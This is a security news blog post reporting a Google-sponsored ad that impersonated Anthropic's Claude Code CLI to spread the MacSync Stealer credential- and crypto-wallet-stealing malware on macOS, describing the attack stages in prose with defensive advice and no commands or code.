Skip to content
  • Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form
Google Ad Used to Spread macOS Credential-Stealing Malware

Google Ad Used to Spread macOS Credential-Stealing Malware

Posted on July 1, 2026 By CWS

A Google-sponsored advertisement posing as Anthropic’s Claude Code CLI has been identified as delivering a macOS credential-stealing malware named “MacSync Stealer.” This malicious software also targets Ledger Live and Ledger Wallet applications to extract cryptocurrency seed phrases.

Uncovering the Malicious Campaign

Researchers at Beelzebub Labs discovered this campaign through their threat intelligence platform, Caronte, following the submission of a suspicious terminal command for analysis. The deceptive ad appeared when users searched for “claude code mac install,” placing it above legitimate search results.

When clicked, users were directed to a counterfeit installation page on sites.google.com, designed to imitate Anthropic’s branding. This page falsely claimed over 12 million downloads and provided a one-click copy button for a harmful terminal command.

Technical Tactics Employed

The attackers used Google Sites strategically due to its content rendering through JavaScript, making it invisible to automated security scanners. Human visitors, however, executed the script, loading the fake page. Trusted domains like sites.google.com often bypass security checks, making this tactic particularly effective.

To deceive less experienced users, the page included a “New to Terminal?” guide, leading them through a fake installation process that normalized entering an admin password. This primed victims to comply with subsequent phishing prompts.

Detailed Breakdown of the Attack

The attack unfolded in six interconnected stages, starting from the ad click to full credential theft and potential wallet hijacking. The process involved stages like a fake install page, a malicious terminal command, and a fake password prompt to capture the Mac login password.

The malware, disguised as a System Preferences prompt, captured passwords, enabling it to access encrypted keychains and browser credentials. For those with Ledger applications, the malware replaced app code, leading to persistent wallet hijacking.

Security Implications and Recommendations

Beelzebub Labs reported the malicious ad to Google, resulting in its removal within 24 hours. However, attackers are known to frequently change URLs to evade detection. Developers are advised to download tools directly from official sources and view any encoded terminal commands with suspicion.

Users who suspect exposure should change their Mac passwords and rotate browser-stored credentials. Recognizing and avoiding these tactics can significantly reduce the risk of credential and data theft.

Cyber Security News Tags:Anthropic, Antivirus, Beelzebub Labs, Caronte, credential theft, crypto wallets, Cybersecurity, Google ad, Ledger Wallet, macOS, macOS security, Malware, Security, threat detection

Post navigation

Previous Post: Citrix Addresses NetScaler Vulnerabilities in Security Update
Next Post: Dawnguard Secures $6.3M for Automated Security Platform

Related Posts

Zerobot Malware Targets Tenda Routers and n8n Platforms Zerobot Malware Targets Tenda Routers and n8n Platforms Cyber Security News
Windows Defender Vulnerability Allows Service Hijacking and Disablement via Symbolic Link Attack Windows Defender Vulnerability Allows Service Hijacking and Disablement via Symbolic Link Attack Cyber Security News
Microsoft Defender for Office 365 to Block Email Bombing Attacks Microsoft Defender for Office 365 to Block Email Bombing Attacks Cyber Security News
Google Warns of CL0P Ransomware Group Actively Exploiting Oracle E-Business Suite Zero-Day Google Warns of CL0P Ransomware Group Actively Exploiting Oracle E-Business Suite Zero-Day Cyber Security News
Telegram-Based ResokerRAT Threatens Windows Security Telegram-Based ResokerRAT Threatens Windows Security Cyber Security News
New Linux Kernel Flaw ‘CIFSwitch’ Threatens Security New Linux Kernel Flaw ‘CIFSwitch’ Threatens Security Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Ousaban Trojan Targets Iberian Banks with PDF Traps
  • Link11 Unveils Advanced DDoS Protection for Modern Networks
  • Urgent Exploitation of Progress Kemp LoadMaster Vulnerability
  • Apple’s ‘Hide My Email’ Flaw Exposes User Addresses
  • Dawnguard Secures $6.3M for Automated Security Platform

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • July 2026
  • June 2026
  • May 2026
  • April 2026
  • March 2026
  • February 2026
  • January 2026
  • December 2025
  • November 2025
  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Ousaban Trojan Targets Iberian Banks with PDF Traps
  • Link11 Unveils Advanced DDoS Protection for Modern Networks
  • Urgent Exploitation of Progress Kemp LoadMaster Vulnerability
  • Apple’s ‘Hide My Email’ Flaw Exposes User Addresses
  • Dawnguard Secures $6.3M for Automated Security Platform

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Copyright © 2026 Cyber Web Spider Blog – News.

Powered by PressBook Masonry Dark